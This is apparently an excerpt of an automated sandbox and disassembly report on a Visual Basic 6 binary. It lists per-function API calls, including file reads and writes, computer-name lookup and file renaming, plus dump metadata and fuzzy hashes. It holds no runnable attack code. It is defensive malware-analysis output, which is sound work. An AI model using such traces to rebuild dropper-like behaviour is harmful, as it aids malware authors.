                                                                                    • #648.MSVBVM60(0000000A), ref: 00421961
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00421970
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00421984
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004219A2
                                                                                    • #570.MSVBVM60(00000000), ref: 004219A9
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
                                                                                    • #525.MSVBVM60(00000000), ref: 004219F4
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004219FF
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421A0F
                                                                                    • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421A2A
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00421A4C
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00421A60
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00421A75
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00421A7C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00421A9E
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00421ACB
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 00421AD2
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421AE9
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421AF0
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421B1B
                                                                                    • __vbaFileSeek.MSVBVM60(?,00000000), ref: 00421B26
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421B36
                                                                                    • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00421B43
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421B72
                                                                                    • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00421B7B
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                    • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BAA
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BB9
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BCD
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BDB
                                                                                    • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BED
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BF8
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C51
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C5E
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C6E
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C7B
                                                                                    • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CB9
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CC4
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CD4
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CE1
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CF1
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CFE
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D20
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D27
                                                                                    • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D56
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D65
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D79
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D87
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D97
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D9E
                                                                                    • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DB1
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DC5
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DD3
                                                                                    • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DE5
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DF0
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E49
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E56
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E66
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E73
                                                                                    • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EB1
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EBC
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ECC
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ED9
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EE9
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EF6
                                                                                    • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F10
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F25
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F2C
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F3C
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F43
                                                                                    • __vbaStrCat.MSVBVM60(004086A8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F59
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F64
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F71
                                                                                    • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F87
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F96
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F9F
                                                                                    • #600.MSVBVM60(00004008,00000000), ref: 00421FC5
                                                                                    • __vbaFreeStr.MSVBVM60(00422028), ref: 00421FFD
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422006
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 0042200F
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422018
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422021
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0042203F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                    • String ID: E
                                                                                    • API String ID: 1020712489-3568589458
                                                                                    • Opcode ID: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
                                                                                    • Instruction ID: 07c48357a9df06a9d6fdd80bdbc38809ff137e737b5eacf3c703d77614347229
                                                                                    • Opcode Fuzzy Hash: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
                                                                                    • Instruction Fuzzy Hash: FC22D571900248EBDB04DFE0EA4CBDEBB74FF48305F208169E602BB2A5DBB55A45CB14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00422959
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                    • #570.MSVBVM60(00000000), ref: 004229A1
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                    • #525.MSVBVM60(00000000), ref: 004229EC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                    • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                    • #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422A8B
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422AF4
                                                                                    • __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
                                                                                    • #618.MSVBVM60(00000000), ref: 00422B1C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422B27
                                                                                    • __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422B78
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
                                                                                    • __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00422BC1
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00422BDE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                    • String ID:
                                                                                    • API String ID: 1066637744-0
                                                                                    • Opcode ID: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
                                                                                    • Instruction ID: 321561c39fc04c0ddddefdb4371944f0511538a09f439f710ae93618e622a53c
                                                                                    • Opcode Fuzzy Hash: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
                                                                                    • Instruction Fuzzy Hash: A681D675D00248EFDB04EFA0EA48BDEBBB4FF48705F108169E612B72A0DB745A49CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 004156D0: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
                                                                                      • Part of subcall function 004156D0: __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
                                                                                      • Part of subcall function 004156D0: __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
                                                                                      • Part of subcall function 004156D0: __vbaFreeStr.MSVBVM60 ref: 0041572D
                                                                                    • #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                    • #529.MSVBVM60(00004008), ref: 00415B88
                                                                                    • #609.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00415BB5
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 00415BC0
                                                                                    • __vbaVarDup.MSVBVM60 ref: 00415BDA
                                                                                    • #709.MSVBVM60(00000000,00406544,000000FF,00000000,?), ref: 00415C0F
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00415C1C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C27
                                                                                    • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 00415C3A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C45
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00415C4C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C57
                                                                                    • #535.MSVBVM60(00000000), ref: 00415C5E
                                                                                    • __vbaStrR4.MSVBVM60 ref: 00415C68
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C73
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00415C7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C85
                                                                                    • __vbaNameFile.MSVBVM60(00000000), ref: 00415C8C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000), ref: 00415CAC
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000000,004032B6), ref: 00415CBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                    • String ID: yymmdd
                                                                                    • API String ID: 2807397001-2871001947
                                                                                    • Opcode ID: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
                                                                                    • Instruction ID: da5027675b2f5c6fcc5daed963e92fc9253badbc1f1ecd6ba165b842c6da7c45
                                                                                    • Opcode Fuzzy Hash: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
                                                                                    • Instruction Fuzzy Hash: 48511D75900208EFDB04DF94D948BDEBBB8FF48305F108569F506BB2A0DB745A48CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
                                                                                    • #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
                                                                                    • SHGetPathFromIDList.SHELL32(?,00000000), ref: 00429D30
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
                                                                                    • #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
                                                                                    • #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
                                                                                    • __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429E05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$ErrorList$#525#537#616AnsiCopyFromOverflowPathSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3494673155-0
                                                                                    • Opcode ID: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
                                                                                    • Instruction ID: 358cedcb50fb0de278f4ad7536de046e5609ba25d4bc9f82414949036a89438a
                                                                                    • Opcode Fuzzy Hash: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
                                                                                    • Instruction Fuzzy Hash: 46310E71D10219AFDB04EFB5DD89DEEBBB8EF58700F10812AE506B6260DA785905CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
                                                                                    • #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
                                                                                    • GetComputerNameA.KERNEL32 ref: 0041E91D
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
                                                                                    • #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
                                                                                    • #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
